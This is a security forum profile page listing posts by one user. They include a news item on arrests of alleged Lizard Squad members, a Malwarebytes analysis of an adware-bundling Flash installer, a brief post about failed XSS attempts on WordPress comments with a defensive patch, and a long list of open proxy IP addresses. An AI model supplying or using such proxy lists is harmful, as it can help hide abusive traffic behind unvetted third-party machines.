Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18750

  • Joined

  • Last visited

  • Days Won

    722

 Content Type 

Everything posted by Nytro

  1. Nytro
    Two alleged members of Lizard Squad arrested following Xbox Live/PSN Christmas attacks Hayden Dingman @haydencd Did you spend Christmas mildly annoyed because you bought a new console, only to find that Xbox Live/ PlayStation Network had been downed by a "nefarious" group known as Lizard Squad? Yes, I know it sounds like a bad episode of 24, but at least now you can revel in a bit of Schadenfreude: Two alleged members have been arrested this week. Lizard Squad came to prominence in 2014 after taking down (or at least claiming to take down) the online presences of numerous gaming companies, including Blizzard, Activision, and Sony. Oh, and perpetrating a bomb threat against a Sony executive in August. Its biggest (or at least most noticeable) moment came just this past week though, when Lizard Squad launched simultaneous DDOS attacks on Xbox Live and PlayStation Network. On Christmas. And then offered to sell its own DDoS tool to others. "Flying too close to the sun" comes to mind. If this week is anything to go by, Lizard Squad is quickly unraveling. The first arrest was reported by Brian Krebs, who writes about security matters on his website Krebs On Security. On Monday he posted a bail document pertaining to one Vinnie Omari, a 22-year-old from Britain who is allegedly part of Lizard Squad. Omari later told The Daily Dot, "they took everything." The police raided Omari's home on Monday and took his computers for evidence, though Omari is out on bail until his hearing in March. To top it off, Finland's National Bureau of Investigation (NBI) picked up another alleged member of Lizard Squad later in the week. The 17-year-old, known as "Ryan," acted as spokesperson for the group in the aftermath of the Christmas attacks. Unlike Omari, Lizard Squad told The Washington Post that Ryan remains in jail. Sursa: Two alleged members of Lizard Squad arrested following Xbox Live/PSN Christmas attacks | PCWorld
  2. Nytro
    Potentially Unwanted Program borrows tricks from malware authors December 31, 2014 | BY Jérôme Segura These days it is getting harder and harder to download a program from its official source, in its original format, without additional pieces of software bundled to it. Companies specializing in so-called ‘download assistants’ or ‘download managers’ claim that they: Provide a value added service to users by suggesting additional programs tailored to the users’ needs. Offer a way for software manufacturers to monetize their free applications. Let’s have a look for ourselves by checking an installer for the Adobe Flash Player. The details are as follows: Name: adobe_flash_setup.exe Size: 809.0 KB MD5: d549def7dd9006954839a187304e3835 imphash: 884310b1928934402ea6fec1dbd3cf5e Out of the box The first thing we noticed was that the program behaves differently whether it is launched on a real physical machine or a Virtual Machine, as described in the diagram below: In a VM such as VirtualBox, the installer skips all the bundled offers and goes straight for the Flash Player. By reverse engineering the installer, we can confirm the detection of Virtual Machines: “VirtualMachine mode – remote offers disabled” There might be a few reasons for this: To avoid unnecessary impressions and installs on ‘fake’ systems that would skew metrics. To appear as a ‘clean’ installer when installed on automated sandboxes or by hand from security researchers. Anti-vm behavior does not necessarily mean that the application is malicious, but it is something that many malware authors use. Time stamp The program was compiled with a date of June 19th 1992, long before PUPs even existed: By using an older time stamp, the program looks less suspicious and it is a technique that we observe with certain malware samples. [Edit] @Hexacorn commented that this is actually a bug with the Delphi programming language. Digital footprint The file was digitally signed by Fried Cookie Ltd. A digital certificate is a trust of authenticity but can be abused and certainly can be used to ‘boost’ a program’s credibility. The certificate details show that said company is located in Tel Aviv, Israel and a VirusTotal scan hints at a connection with InstallCore, a “digital content delivery platform”. The link between thetwo companies can be established from this blog statement: In early 2013, Fried Cookie proudly announced a formal partnership with installCore. We are now both under the ironSource umbrella of products. The offers The first offer cannot be opted out from, you must accept it in order to keep going: This mandatory offer installs the Vosteran Browser, a Chromium-based browser created by Fried Cookie Ltd. Most searches to download the Vosteran Browser on its own return results for how to remove it instead: Finally, Vosteran’s privacy policy states that: We may also use a third party tracking service that uses cookies (analytics) to track aggregate non-Personal Identifiable Information regarding our Software and/or Services. Please note that We have no control over third parties privacy policies. This essentially means that Vosteran Search cannot be held liable for abuses committed by third parties. There are also various other offers bundled in this installer, courtesy of “distributer” called Entarion Ltd., with an “address” conveniently located in Cyprus, well-known as a safe haven for offshore companies. d.updateweb.org softwareportals@gmail.com Stratigou Spyrou Stathopoulou, 14B, 3066, Limassol, Cyprus Note that the domain is using Privacy Protect to hide the registrant’s details. However, a search on the Gmail address shows that there is another domain seemingly belonging to an individual in St Petersburg, Russia. It doesn’t take too long to find several reports of unwanted pop-ups aggressively pushing bogus registry cleaners many of which are funneled through securedshopgate.com a well hidden portal with an SSL certificate tied to an address in Cyprus, once again: Installing the Flash Player from this installer is not an easy task due to the large number of promoted software: It could be argued that this particular example is not the norm and that most download managers do explicitly let the user choose or decline additional pieces of software that have been vetted as legitimate. However, opposite examples do exist as well and do cause a lot of headaches and large amounts of money spent on programs whose effectiveness can be questioned. To quickly remove any trace from these Potentially Unwanted Programs (PUPs), you can download and run Malwarebytes Anti-Malware: Malwarebytes’ criteria for listing a program as a PUP can be viewed here. The lists is pretty thorough and will most likely continue to evolve as PUP makers diversify their operations. Consumers should be able to make educated choices rather than being mislead down a path that they didn’t intend to take. Unfortunately, because software bundles are such an attractive business model from a financial standpoint, the line between legitimate and fraudulent gets crossed too many times. Special thanks to Adrian Gill, Joshua Cannell and JP Taggart for additional research assistance. Sursa: https://blog.malwarebytes.org/fraud-scam/2014/12/potentially-unwanted-program-borrows-tricks-from-malware-authors/
  3. Nytro
    Pe RST nu a mers, si nu am facut nimic special. Imi facea strip la <script>. Am incercat si alti vectori si tot nu a mers. Am mai incercat pe inca un blog si la fel, nu a mers. PS: Nu va chinuiti sa incercati pe RST. wp-comments-post.php $comment_content = ( isset($_POST['comment']) ) ? trim($_POST['comment']) : null; in $comment_content = ( isset($_POST['comment']) ) ? trim(htmlentities($_POST['comment'], ENT_QUOTES)) : null;
  4. Nytro
    Nu prea a mers...
  5. Nytro
    E Revelionu, nu sta nimeni azi de asa ceva
  6. Nytro
    [h=1]31-12-14 | Free SSL Proxies (3103)[/h]By: gelbeseiten on Dec 30th, 2014 31-12-14 | Free SSL Proxies (3103) Checked & filtered (Secure Socket Layer Proxies) 1.160.13.205:8080 1.162.161.4:9064 1.163.201.41:9064 1.163.80.130:9064 1.164.112.136:9064 1.164.181.116:9064 1.165.162.128:8080 1.169.241.25:9064 1.170.23.91:9064 1.172.22.93:9064 1.172.54.152:9064 1.173.4.78:9064 1.173.63.122:9064 1.174.62.50:9064 1.175.121.231:9064 1.186.217.7:9064 1.186.239.132:9064 1.23.213.99:9064 1.93.8.169:3128 101.1.16.123:3128 101.63.203.130:9064 103.17.164.185:80 103.233.183.6:8080 103.29.221.167:80 103.29.221.20:80 103.41.176.1:7808 104.131.119.230:3128 104.131.122.190:3128 106.37.177.251:3128 107.170.216.78:3128 107.182.17.243:7808 107.182.17.243:8089 109.104.144.42:8080 110.117.90.185:8123 110.232.83.38:8080 111.10.100.136:8123 111.10.100.227:8123 111.10.100.65:8123 111.10.102.43:8123 111.10.103.14:8123 111.10.112.199:8123 111.10.113.183:8123 111.10.117.54:8123 111.10.118.112:8123 111.10.118.159:8123 111.10.129.1:8123 111.10.132.219:8123 111.10.136.167:8123 111.10.137.183:8123 111.10.137.213:8123 111.10.137.94:8123 111.10.139.191:8123 111.10.139.72:8123 111.10.14.106:8123 111.10.144.102:8123 111.10.144.150:8123 111.10.145.188:8123 111.10.145.65:8123 111.10.146.113:8123 111.10.146.235:8123 111.10.146.251:8123 111.10.146.6:8123 111.10.147.135:8123 111.10.147.165:8123 111.10.147.19:8123 111.10.147.216:8123 111.10.147.27:8123 111.10.15.162:8123 111.10.152.119:8123 111.10.152.16:8123 111.10.152.163:8123 111.10.152.71:8123 111.10.153.80:8123 111.10.154.11:8123 111.10.155.239:8123 111.10.155.71:8123 111.10.158.149:8123 111.10.162.152:8123 111.10.164.100:8123 111.10.164.120:8123 111.10.165.253:8123 111.10.166.122:8123 111.10.166.51:8123 111.10.167.176:8123 111.10.167.31:8123 111.10.175.240:8123 111.10.178.217:8123 111.10.180.230:8123 111.10.185.126:8123 111.10.186.0:8123 111.10.186.139:8123 111.10.187.185:8123 111.10.187.55:8123 111.10.188.67:8123 111.10.192.17:8123 111.10.192.96:8123 111.10.193.175:8123 111.10.194.124:8123 111.10.195.69:8123 111.10.196.177:8123 111.10.196.85:8123 111.10.196.88:8123 111.10.197.35:8123 111.10.197.50:8123 111.10.198.251:8123 111.10.199.47:8123 111.10.219.154:8123 111.10.29.114:8123 111.10.29.143:8123 111.10.39.115:8123 111.10.45.179:8123 111.10.48.123:8123 111.10.49.104:8123 111.10.50.119:8123 111.10.50.225:8123 111.10.72.212:8123 111.10.74.150:8123 111.10.88.162:8123 111.10.88.82:8123 111.10.90.214:8123 111.10.91.56:8123 111.10.96.11:8123 111.10.96.174:8123 111.10.96.54:8123 111.10.97.104:8123 111.10.97.154:8123 111.10.97.202:8123 111.10.97.218:8123 111.10.97.229:8123 111.10.97.239:8123 111.10.98.63:8123 111.11.246.153:8123 111.161.126.100:80 111.161.126.101:80 111.161.126.98:80 111.161.126.99:80 111.2.240.156:8123 111.241.252.11:9064 111.242.162.241:9064 111.242.42.248:9064 111.243.93.199:9064 111.249.155.210:9064 111.251.216.197:9064 111.253.235.46:9064 111.253.62.235:9064 111.254.184.58:9064 111.254.198.107:9064 111.255.135.146:9064 111.255.62.21:9064 111.73.240.176:8123 111.9.174.250:8123 111.9.174.44:8123 111.9.234.71:8123 111.9.243.49:8123 111.91.90.190:9064 111.94.116.56:9064 112.0.104.161:8123 112.0.104.52:8123 112.0.119.47:8123 112.0.206.168:8123 112.0.21.153:8123 112.0.212.120:8123 112.0.217.7:8123 112.0.29.43:8123 112.1.160.206:8123 112.1.167.2:8123 112.1.184.59:8123 112.15.120.54:8123 112.15.24.11:8123 112.15.25.155:8123 112.15.29.109:8123 112.15.62.149:8123 112.15.87.38:8123 112.18.11.245:8123 112.18.152.14:8123 112.18.154.101:8123 112.18.157.79:8123 112.18.159.117:8123 112.18.159.151:8123 112.18.159.245:8123 112.18.159.36:8123 112.18.160.34:8123 112.18.160.48:8123 112.18.163.120:8123 112.18.163.174:8123 112.18.164.184:8123 112.18.164.94:8123 112.18.165.160:8123 112.18.165.2:8123 112.18.166.185:8123 112.18.166.211:8123 112.18.166.222:8123 112.18.166.249:8123 112.18.167.128:8123 112.18.167.131:8123 112.18.168.142:8123 112.18.170.139:8123 112.18.170.15:8123 112.18.171.32:8123 112.18.171.4:8123 112.18.175.125:8123 112.18.175.142:8123 112.18.176.142:8123 112.18.176.165:8123 112.18.176.99:8123 112.18.178.133:8123 112.18.178.15:8123 112.18.178.90:8123 112.18.179.240:8123 112.18.187.133:8123 112.18.196.149:8123 112.18.197.85:8123 112.18.199.109:8123 112.18.199.152:8123 112.18.20.130:8123 112.18.21.41:8123 112.18.23.248:8123 112.18.24.43:8123 112.18.49.53:8123 112.18.56.186:8123 112.18.62.231:8123 112.18.65.203:8123 112.18.75.18:8123 112.18.79.154:8123 112.193.165.27:8118 112.196.44.26:9064 112.197.183.181:9064 112.20.130.11:8123 112.20.134.186:8123 112.20.246.58:8123 112.21.225.72:8123 112.21.242.52:8123 112.21.250.161:8123 112.22.230.167:8123 112.22.234.165:8123 112.22.245.250:8123 112.23.121.3:8123 112.23.227.10:8123 112.24.126.78:8123 112.24.136.47:8123 112.24.61.131:8123 112.24.78.53:8123 112.24.92.154:8123 112.24.94.199:8123 112.24.94.24:8123 112.3.100.176:8123 112.3.104.8:8123 112.3.105.162:8123 112.3.124.201:8123 112.3.135.88:8123 112.3.202.148:8123 112.3.211.218:8123 112.44.226.140:8123 112.44.226.43:8123 112.44.227.202:8123 112.44.230.150:8123 112.44.234.57:8123 112.44.236.5:8123 112.44.242.197:8123 112.44.243.74:8123 112.44.247.105:8123 112.44.250.170:8123 112.44.251.41:8123 112.44.252.76:8123 112.45.179.183:8123 112.45.179.189:8123 112.45.179.191:8123 112.45.183.43:8123 112.45.185.235:8123 112.45.188.163:8123 112.65.44.71:3128 112.95.106.141:9999 112.95.204.11:9999 112.95.76.182:9000 113.119.205.252:9999 113.193.104.21:9064 113.193.160.150:9064 113.201.63.12:80 113.245.195.3:8118 113.252.146.176:3128 113.87.18.234:9999 113.87.82.249:9999 114.215.237.93:3128 114.25.161.229:9064 114.27.218.101:9064 114.27.226.126:9064 114.36.146.246:9064 114.36.151.215:9064 114.37.200.171:9064 114.37.43.236:9064 114.37.55.219:9064 114.37.94.32:9064 114.38.105.123:9064 114.38.60.45:9064 114.38.61.121:9064 114.40.157.7:9064 114.40.251.63:9064 114.40.53.164:9064 114.40.69.242:8080 114.43.112.208:9064 114.43.167.163:9064 114.46.120.223:9064 114.47.128.122:9064 114.47.59.33:9064 114.69.229.69:8080 115.117.116.133:9064 115.124.75.150:80 115.154.191.110:3128 115.194.158.161:8118 115.228.62.182:3128 115.28.23.36:3128 115.28.236.172:3128 115.28.90.72:8080 116.10.179.55:8118 116.203.247.188:9064 116.228.7.42:8080 116.236.216.116:8080 116.255.168.29:808 117.121.204.125:8080 117.121.242.8:15275 117.136.146.87:8123 117.136.148.214:8123 117.139.149.216:8123 117.139.2.50:8123 117.139.28.236:8123 117.139.28.252:8123 117.139.28.50:8123 117.139.29.33:8123 117.139.35.89:8123 117.139.36.96:8123 117.139.38.176:8123 117.139.38.48:8123 117.139.43.174:8123 117.139.43.95:8123 117.139.44.171:8123 117.139.44.94:8123 117.139.45.131:8123 117.139.45.175:8123 117.139.45.176:8123 117.139.67.225:8123 117.139.70.128:8123 117.139.71.46:8123 117.147.229.30:8123 117.148.41.116:8123 117.148.43.158:8123 117.148.50.175:8123 117.149.217.232:8123 117.149.221.106:8123 117.149.224.141:8123 117.149.243.146:8123 117.149.247.8:8123 117.162.104.64:8123 117.162.110.148:8123 117.162.112.90:8123 117.162.116.55:8123 117.162.123.55:8123 117.162.123.66:8123 117.162.130.107:8123 117.162.132.149:8123 117.162.136.13:8123 117.162.139.103:8123 117.162.164.144:8123 117.162.165.86:8123 117.162.168.37:8123 117.162.171.180:8123 117.162.173.44:8123 117.162.175.158:8123 117.162.185.159:8123 117.162.196.153:8123 117.162.196.8:8123 117.162.199.54:8123 117.162.200.251:8123 117.162.202.70:8123 117.162.206.192:8123 117.162.208.208:8123 117.162.210.16:8123 117.162.216.45:8123 117.162.217.228:8123 117.162.225.83:8123 117.162.227.146:8123 117.162.227.252:8123 117.162.232.213:8123 117.162.234.80:8123 117.162.239.219:8123 117.162.242.178:8123 117.162.247.134:8123 117.162.253.255:8123 117.162.41.192:8123 117.162.60.38:8123 117.162.81.92:8123 117.162.82.174:8123 117.162.97.155:8123 117.163.100.252:8123 117.163.108.76:8123 117.163.112.46:8123 117.163.113.38:8123 117.163.114.154:8123 117.163.116.134:8123 117.163.118.143:8123 117.163.123.28:8123 117.163.127.224:8123 117.163.128.181:8123 117.163.129.204:8123 117.163.130.243:8123 117.163.132.85:8123 117.163.133.251:8123 117.163.137.202:8123 117.163.137.40:8123 117.163.138.122:8123 117.163.149.109:8123 117.163.150.173:8123 117.163.150.209:8123 117.163.151.144:8123 117.163.151.188:8123 117.163.154.60:8123 117.163.155.232:8123 117.163.156.218:8123 117.163.156.77:8123 117.163.157.82:8123 117.163.158.174:8123 117.163.167.37:8123 117.163.168.132:8123 117.163.169.167:8123 117.163.17.216:8123 117.163.171.42:8123 117.163.171.75:8123 117.163.179.45:8123 117.163.186.230:8123 117.163.193.73:8123 117.163.203.129:8123 117.163.203.242:8123 117.163.204.8:8123 117.163.206.203:8123 117.163.206.238:8123 117.163.214.17:8123 117.163.217.140:8123 117.163.217.158:8123 117.163.220.68:8123 117.163.221.202:8123 117.163.225.106:8123 117.163.227.165:8123 117.163.227.63:8123 117.163.228.24:8123 117.163.236.204:8123 117.163.239.150:8123 117.163.245.80:8123 117.163.252.159:8123 117.163.252.168:8123 117.163.252.240:8123 117.163.28.108:8123 117.163.30.31:8123 117.163.30.70:8123 117.163.31.117:8123 117.163.31.206:8123 117.163.4.178:8123 117.163.4.206:8123 117.163.46.153:8123 117.163.64.209:8123 117.163.64.47:8123 117.163.65.57:8123 117.163.66.84:8123 117.163.68.19:8123 117.163.69.205:8123 117.163.7.0:8123 117.163.9.136:8123 117.163.97.98:8123 117.163.98.255:8123 117.164.10.73:8123 117.164.128.243:8123 117.164.131.17:8123 117.164.133.197:8123 117.164.133.254:8123 117.164.134.168:8123 117.164.134.52:8123 117.164.134.71:8123 117.164.134.97:8123 117.164.135.206:8123 117.164.136.175:8123 117.164.136.70:8123 117.164.137.91:8123 117.164.139.166:8123 117.164.139.179:8123 117.164.139.190:8123 117.164.139.94:8123 117.164.14.185:8123 117.164.140.21:8123 117.164.142.81:8123 117.164.143.234:8123 117.164.144.32:8123 117.164.146.12:8123 117.164.146.27:8123 117.164.150.57:8123 117.164.152.234:8123 117.164.153.82:8123 117.164.156.87:8123 117.164.158.196:8123 117.164.158.59:8123 117.164.161.235:8123 117.164.167.151:8123 117.164.167.23:8123 117.164.167.32:8123 117.164.167.69:8123 117.164.171.229:8123 117.164.173.215:8123 117.164.174.158:8123 117.164.174.168:8123 117.164.174.193:8123 117.164.175.184:8123 117.164.175.233:8123 117.164.184.228:8123 117.164.186.234:8123 117.164.192.2:8123 117.164.195.89:8123 117.164.196.12:8123 117.164.196.76:8123 117.164.197.211:8123 117.164.199.127:8123 117.164.199.62:8123 117.164.201.243:8123 117.164.203.107:8123 117.164.204.222:8123 117.164.206.147:8123 117.164.206.36:8123 117.164.209.187:8123 117.164.210.209:8123 117.164.213.138:8123 117.164.214.82:8123 117.164.215.152:8123 117.164.215.224:8123 117.164.217.164:8123 117.164.227.62:8123 117.164.230.112:8123 117.164.234.113:8123 117.164.236.216:8123 117.164.245.66:8123 117.164.28.247:8123 117.164.28.86:8123 117.164.28.98:8123 117.164.29.62:8123 117.164.3.137:8123 117.164.3.2:8123 117.164.32.38:8123 117.164.37.245:8123 117.164.38.255:8123 117.164.39.251:8123 117.164.44.220:8123 117.164.44.249:8123 117.164.45.62:8123 117.164.48.196:8123 117.164.48.230:8123 117.164.49.0:8123 117.164.5.199:8123 117.164.5.234:8123 117.164.50.150:8123 117.164.54.0:8123 117.164.55.199:8123 117.164.56.193:8123 117.164.58.197:8123 117.164.59.238:8123 117.164.60.182:8123 117.164.7.94:8123 117.164.8.142:8123 117.164.95.2:8123 117.164.95.36:8123 117.165.100.8:8123 117.165.101.55:8123 117.165.102.246:8123 117.165.103.103:8123 117.165.120.32:8123 117.165.121.69:8123 117.165.122.192:8123 117.165.128.131:8123 117.165.13.231:8123 117.165.130.188:8123 117.165.131.53:8123 117.165.131.97:8123 117.165.135.141:8123 117.165.138.180:8123 117.165.139.235:8123 117.165.14.230:8123 117.165.140.147:8123 117.165.140.213:8123 117.165.143.67:8123 117.165.145.157:8123 117.165.146.116:8123 117.165.146.88:8123 117.165.148.198:8123 117.165.15.149:8123 117.165.153.56:8123 117.165.17.41:8123 117.165.178.62:8123 117.165.18.130:8123 117.165.181.197:8123 117.165.187.153:8123 117.165.198.154:8123 117.165.200.121:8123 117.165.210.53:8123 117.165.211.134:8123 117.165.217.63:8123 117.165.220.47:8123 117.165.224.122:8123 117.165.226.102:8123 117.165.228.215:8123 117.165.230.224:8123 117.165.29.13:8123 117.165.31.6:8123 117.165.32.220:8123 117.165.33.112:8123 117.165.33.115:8123 117.165.35.126:8123 117.165.39.197:8123 117.165.42.7:8123 117.165.43.16:8123 117.165.48.211:8123 117.165.49.114:8123 117.165.51.214:8123 117.165.53.44:8123 117.165.60.117:8123 117.165.62.233:8123 117.165.66.173:8123 117.165.66.5:8123 117.165.76.111:8123 117.165.79.234:8123 117.165.79.47:8123 117.165.8.165:8123 117.165.8.179:8123 117.165.8.237:8123 117.165.83.147:8123 117.165.86.192:8123 117.165.89.143:8123 117.165.89.236:8123 117.165.91.146:8123 117.165.94.70:8123 117.166.104.99:8123 117.166.105.193:8123 117.166.105.239:8123 117.166.106.220:8123 117.166.106.95:8123 117.166.109.13:8123 117.166.109.3:8123 117.166.113.194:8123 117.166.116.225:8123 117.166.120.122:8123 117.166.122.57:8123 117.166.124.185:8123 117.166.126.32:8123 117.166.159.236:8123 117.166.169.112:8123 117.166.170.136:8123 117.166.170.61:8123 117.166.172.49:8123 117.166.173.124:8123 117.166.173.227:8123 117.166.174.211:8123 117.166.18.104:8123 117.166.18.105:8123 117.166.18.150:8123 117.166.18.184:8123 117.166.185.74:8123 117.166.186.157:8123 117.166.188.117:8123 117.166.196.60:8123 117.166.197.189:8123 117.166.200.171:8123 117.166.203.204:8123 117.166.205.70:8123 117.166.206.18:8123 117.166.206.195:8123 117.166.207.163:8123 117.166.207.75:8123 117.166.212.52:8123 117.166.215.221:8123 117.166.219.20:8123 117.166.22.214:8123 117.166.220.177:8123 117.166.221.91:8123 117.166.223.197:8123 117.166.224.157:8123 117.166.225.65:8123 117.166.226.213:8123 117.166.226.47:8123 117.166.231.241:8123 117.166.234.99:8123 117.166.243.73:8123 117.166.247.178:8123 117.166.28.132:8123 117.166.34.176:8123 117.166.40.72:8123 117.166.41.199:8123 117.166.42.62:8123 117.166.44.207:8123 117.166.45.135:8123 117.166.45.18:8123 117.166.46.215:8123 117.166.47.250:8123 117.166.48.5:8123 117.166.50.238:8123 117.166.50.67:8123 117.166.52.203:8123 117.166.53.170:8123 117.166.54.126:8123 117.166.56.8:8123 117.166.56.87:8123 117.166.57.18:8123 117.166.57.82:8123 117.166.59.178:8123 117.166.68.64:8123 117.166.70.18:8123 117.166.70.197:8123 117.166.70.242:8123 117.166.73.223:8123 117.166.74.211:8123 117.166.74.247:8123 117.166.75.110:8123 117.166.75.13:8123 117.166.76.83:8123 117.166.78.65:8123 117.166.79.22:8123 117.166.79.45:8123 117.166.86.183:8123 117.166.88.179:8123 117.166.91.10:8123 117.166.93.173:8123 117.166.94.16:8123 117.166.96.215:8123 117.166.98.185:8123 117.166.99.205:8123 117.167.106.228:8123 117.167.107.68:8123 117.167.131.63:8123 117.167.133.46:8123 117.167.139.75:8123 117.167.140.2:8123 117.167.142.219:8123 117.167.142.66:8123 117.167.153.70:8123 117.167.165.118:8123 117.167.165.140:8123 117.167.168.197:8123 117.167.169.30:8123 117.167.177.65:8123 117.167.178.190:8123 117.167.181.154:8123 117.167.183.69:8123 117.167.208.117:8123 117.167.208.46:8123 117.167.212.160:8123 117.167.222.124:8123 117.167.222.72:8123 117.167.224.196:8123 117.167.225.129:8123 117.167.229.18:8123 117.167.229.50:8123 117.167.231.72:8123 117.167.232.171:8123 117.167.233.112:8123 117.167.235.211:8123 117.167.244.29:8123 117.167.40.105:8123 117.167.42.91:8123 117.167.45.174:8123 117.167.59.103:8123 117.167.6.168:8123 117.167.65.228:8123 117.167.66.184:8123 117.167.66.223:8123 117.167.67.153:8123 117.167.7.18:8123 117.167.7.193:8123 117.167.70.225:8123 117.167.8.178:8123 117.167.8.185:8123 117.167.81.254:8123 117.167.89.77:8123 117.169.152.85:8123 117.169.160.178:8123 117.169.161.185:8123 117.169.162.188:8123 117.169.162.74:8123 117.169.165.42:8123 117.169.166.76:8123 117.169.166.87:8123 117.169.166.90:8123 117.169.167.173:8123 117.169.167.3:8123 117.169.186.105:8123 117.169.187.91:8123 117.169.189.141:8123 117.169.191.155:8123 117.169.195.52:8123 117.169.200.163:8123 117.169.201.98:8123 117.169.205.29:8123 117.169.206.244:8123 117.169.206.93:8123 117.169.206.94:8123 117.169.207.212:8123 117.169.224.146:8123 117.169.225.28:8123 117.169.228.116:8123 117.169.228.132:8123 117.169.228.209:8123 117.169.228.242:8123 117.169.230.155:8123 117.169.230.230:8123 117.169.231.18:8123 117.169.232.90:8123 117.169.234.138:8123 117.169.236.136:8123 117.169.237.12:8123 117.169.237.154:8123 117.169.237.245:8123 117.169.237.28:8123 117.169.238.137:8123 117.169.238.207:8123 117.169.241.112:8123 117.169.243.226:8123 117.169.245.7:8123 117.170.104.120:8123 117.170.104.213:8123 117.170.105.35:8123 117.170.115.236:8123 117.170.119.142:8123 117.170.12.149:8123 117.170.12.231:8123 117.170.121.153:8123 117.170.121.5:8123 117.170.122.44:8123 117.170.124.110:8123 117.170.131.28:8123 117.170.132.222:8123 117.170.134.109:8123 117.170.142.195:8123 117.170.142.85:8123 117.170.143.30:8123 117.170.147.57:8123 117.170.155.73:8123 117.170.158.193:8123 117.170.172.221:8123 117.170.173.151:8123 117.170.173.250:8123 117.170.175.103:8123 117.170.176.40:8123 117.170.178.20:8123 117.170.179.149:8123 117.170.18.129:8123 117.170.18.72:8123 117.170.19.132:8123 117.170.19.230:8123 117.170.200.5:8123 117.170.206.27:8123 117.170.207.44:8123 117.170.21.105:8123 117.170.212.222:8123 117.170.214.255:8123 117.170.216.135:8123 117.170.217.117:8123 117.170.217.203:8123 117.170.217.99:8123 117.170.220.246:8123 117.170.222.206:8123 117.170.223.38:8123 117.170.223.95:8123 117.170.225.249:8123 117.170.23.32:8123 117.170.23.97:8123 117.170.230.110:8123 117.170.233.15:8123 117.170.237.2:8123 117.170.238.255:8123 117.170.242.69:8123 117.170.243.13:8123 117.170.247.61:8123 117.170.248.125:8123 117.170.248.202:8123 117.170.249.25:8123 117.170.26.134:8123 117.170.3.67:8123 117.170.31.106:8123 117.170.33.240:8123 117.170.34.50:8123 117.170.35.179:8123 117.170.4.133:8123 117.170.44.232:8123 117.170.59.92:8123 117.170.6.233:8123 117.170.7.181:8123 117.171.102.30:8123 117.171.105.56:8123 117.171.116.223:8123 117.171.119.9:8123 117.171.124.119:8123 117.171.124.134:8123 117.171.126.116:8123 117.171.131.224:8123 117.171.138.174:8123 117.171.143.203:8123 117.171.144.146:8123 117.171.145.74:8123 117.171.145.95:8123 117.171.148.164:8123 117.171.150.126:8123 117.171.153.173:8123 117.171.153.236:8123 117.171.153.47:8123 117.171.161.90:8123 117.171.162.66:8123 117.171.163.47:8123 117.171.172.239:8123 117.171.174.252:8123 117.171.174.72:8123 117.171.187.236:8123 117.171.19.82:8123 117.171.190.34:8123 117.171.22.109:8123 117.171.22.157:8123 117.171.220.48:8123 117.171.221.110:8123 117.171.224.62:8123 117.171.224.78:8123 117.171.225.237:8123 117.171.226.186:8123 117.171.226.9:8123 117.171.229.24:8123 117.171.229.253:8123 117.171.230.109:8123 117.171.230.203:8123 117.171.231.149:8123 117.171.232.71:8123 117.171.233.11:8123 117.171.234.15:8123 117.171.237.186:8123 117.171.238.86:8123 117.171.241.160:8123 117.171.241.164:8123 117.171.242.184:8123 117.171.244.170:8123 117.171.247.147:8123 117.171.247.91:8123 117.171.250.38:8123 117.171.250.84:8123 117.171.251.90:8123 117.171.29.30:8123 117.171.30.96:8123 117.171.31.161:8123 117.171.45.26:8123 117.171.49.168:8123 117.171.49.48:8123 117.171.53.182:8123 117.171.53.249:8123 117.171.54.157:8123 117.171.56.97:8123 117.171.59.31:8123 117.171.61.155:8123 117.171.66.231:8123 117.171.73.117:8123 117.171.77.121:8123 117.171.78.132:8123 117.171.86.185:8123 117.172.153.173:8123 117.172.155.187:8123 117.172.155.222:8123 117.172.155.235:8123 117.172.157.201:8123 117.172.220.213:8123 117.172.220.6:8123 117.172.222.192:8123 117.172.76.198:8123 117.172.77.138:8123 117.172.77.187:8123 117.172.78.204:8123 117.172.78.3:8123 117.173.108.188:8123 117.173.108.219:8123 117.173.110.112:8123 117.173.120.129:8123 117.173.121.55:8123 117.173.16.92:8123 117.173.18.106:8123 117.173.190.231:8123 117.173.20.115:8123 117.173.20.207:8123 117.173.20.230:8123 117.173.20.233:8123 117.173.20.43:8123 117.173.20.55:8123 117.173.20.85:8123 117.173.20.91:8123 117.173.200.247:8123 117.173.205.155:8123 117.173.21.146:8123 117.173.21.156:8123 117.173.21.165:8123 117.173.21.242:8123 117.173.21.46:8123 117.173.21.74:8123 117.173.21.88:8123 117.173.22.202:8123 117.173.22.223:8123 117.173.22.34:8123 117.173.23.125:8123 117.173.23.127:8123 117.173.23.132:8123 117.173.23.133:8123 117.173.23.14:8123 117.173.23.225:8123 117.173.23.44:8123 117.173.23.92:8123 117.173.235.138:8123 117.173.237.23:8123 117.173.238.110:8123 117.173.241.136:8123 117.173.242.242:8123 117.173.242.66:8123 117.173.244.45:8123 117.173.245.184:8123 117.173.245.55:8123 117.173.246.108:8123 117.173.246.86:8123 117.173.253.120:8123 117.173.253.133:8123 117.173.253.141:8123 117.173.253.17:8123 117.173.253.28:8123 117.173.254.142:8123 117.173.254.234:8123 117.173.254.63:8123 117.173.58.107:8123 117.173.58.136:8123 117.173.59.239:8123 117.173.59.246:8123 117.173.62.153:8123 117.173.63.170:8123 117.173.80.10:8123 117.173.80.8:8123 117.173.81.209:8123 117.173.81.236:8123 117.173.82.252:8123 117.174.1.100:8123 117.174.193.26:8123 117.174.194.135:8123 117.174.194.89:8123 117.174.195.125:8123 117.174.195.141:8123 117.174.196.191:8123 117.174.197.94:8123 117.174.199.87:8123 117.174.2.185:8123 117.174.200.170:8123 117.174.201.110:8123 117.174.201.239:8123 117.174.201.91:8123 117.174.203.137:8123 117.174.203.181:8123 117.174.203.45:8123 117.174.203.88:8123 117.174.206.166:8123 117.174.206.30:8123 117.174.207.176:8123 117.174.207.54:8123 117.174.208.147:8123 117.174.216.180:8123 117.174.217.155:8123 117.174.228.235:8123 117.174.230.24:8123 117.174.233.130:8123 117.174.237.128:8123 117.174.3.177:8123 117.175.102.140:8123 117.175.102.152:8123 117.175.102.167:8123 117.175.108.156:8123 117.175.108.190:8123 117.175.109.150:8123 117.175.109.200:8123 117.175.109.55:8123 117.175.110.168:8123 117.175.110.222:8123 117.175.111.200:8123 117.175.111.211:8123 117.175.111.38:8123 117.175.116.128:8123 117.175.116.137:8123 117.175.116.43:8123 117.175.117.136:8123 117.175.117.186:8123 117.175.119.182:8123 117.175.120.130:8123 117.175.121.26:8123 117.175.124.216:8123 117.175.124.32:8123 117.175.125.137:8123 117.175.125.38:8123 117.175.192.35:8123 117.175.197.143:8123 117.175.197.208:8123 117.175.198.97:8123 117.175.200.181:8123 117.175.213.236:8123 117.175.214.49:8123 